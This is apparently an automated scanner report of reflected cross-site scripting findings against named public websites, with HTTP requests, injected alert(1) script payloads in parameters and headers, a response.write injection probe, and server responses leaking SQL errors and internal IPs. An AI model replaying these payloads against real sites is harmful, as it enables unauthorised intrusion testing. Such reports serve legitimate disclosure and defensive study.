<!-- ERROR in function: "DB_Template_GET_BySiteAndPageType()" - Local date/time : Saturday, October 15, 2011 10:50:50 AM - Source : .Net SqlClient Data Provider - Message : Unclosed quo ...[SNIP]... 68409241-22)''. - message : undefined - Number : 105 - Description : undefined - description : undefined - URL: cfg=response.write(268409241-22)'&conf=wac&fromprefetch=1&p=24&s=143&5f1a7'-alert(1)-'a5336cd2117=1 - Remote IP : 50.23.123.106 - Referrer URL : - Server IP: 192.168.20.64, SODO - MachineName: SODO - Stack Trace: at System.Data.SqlClient.SqlConnection.OnError(SqlException e ...[SNIP]...
1.24. http://www.scout.com/staticpages/www/24/wac/a.z [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.scout.com
Path: /staticpages/www/24/wac/a.z
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 12d5e(a)a46397c192b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:50:50 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 18:00:50 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2477

<!-- ERROR in function: "DB_Template_GET_BySiteAndPageType()" - Local date/time : Saturday, October 15, 2011 10:50:50 AM - Source : .Net SqlClient Data Provider - Message : Unclosed quo ...[SNIP]... <!-- v. 0.0.0.21898 Server Date: Saturday, October 15, 2011 10:50:50 AM URL: http://www.scout.com:80/Legacy/a.z?cfg=response.write(268409241-22)'&conf=wac&fromprefetch=1&p=24&s=143&12d5e(a)a46397c192b=1 Server IP: 192.168.20.94, SCOUTWEB2 Page Execution Time: 4 ms --> ...[SNIP]...
1.25. http://www.sqlservercentral.com/Forums/Topic1189509-391-1.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.sqlservercentral.com
Path: /Forums/Topic1189509-391-1.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7ac3"><script>alert(1)</script>996d28993fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Forums/Topic1189509-391-1.aspx?d7ac3"><script>alert(1)</script>996d28993fe=1 HTTP/1.1
Host: www.sqlservercentral.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q='%22%3C%2Ftitle%3E%3Cscript+src%22+urchin.js'#q='%22%3C/title%3E%3Cscript+src%22+urchin.js'&hl=en&tbo=1&output=search&source=lnt&tbs=qdr:w&sa=X&ei=VJGYTuXZBLDYiAKFn43CDQ&ved=0CAYQpwUoAw&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=43b88dc4ecfc77e7&biw=1326&bih=890
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the image request parameter is copied into the HTML document as plain text between tags. The payload 86a9e<script>alert(1)</script>238333c352c was submitted in the image parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload eb89d<script>alert(1)</script>ab45e8e8d79 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67fa6"-alert(1)-"8da9de954fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72c8a'-alert(1)-'e71248a12d5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:51:02 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 18:01:02 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2498

<!-- ERROR in function: "DB_Template_GET_BySiteAndPageType()" - Local date/time : Saturday, October 15, 2011 10:51:02 AM - Source : .Net SqlClient Data Provider - Message : Unclosed quo ...[SNIP]...
- description : undefined - URL: cfg=response.write(268409241-22)'&conf=wac&fromprefetch=1&p=24&s=143 - Remote IP : 50.23.123.106 - Referrer URL : http://www.google.com/search?hl=en&q=72c8a'-alert(1)-'e71248a12d5 - Server IP: 192.168.20.95, SCOUTWEB3 - MachineName: SCOUTWEB3 - Stack Trace: at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) at Syst ...[SNIP]...
Report generated by XSS.CX at Fri Oct 28 15:09:54 CDT 2011.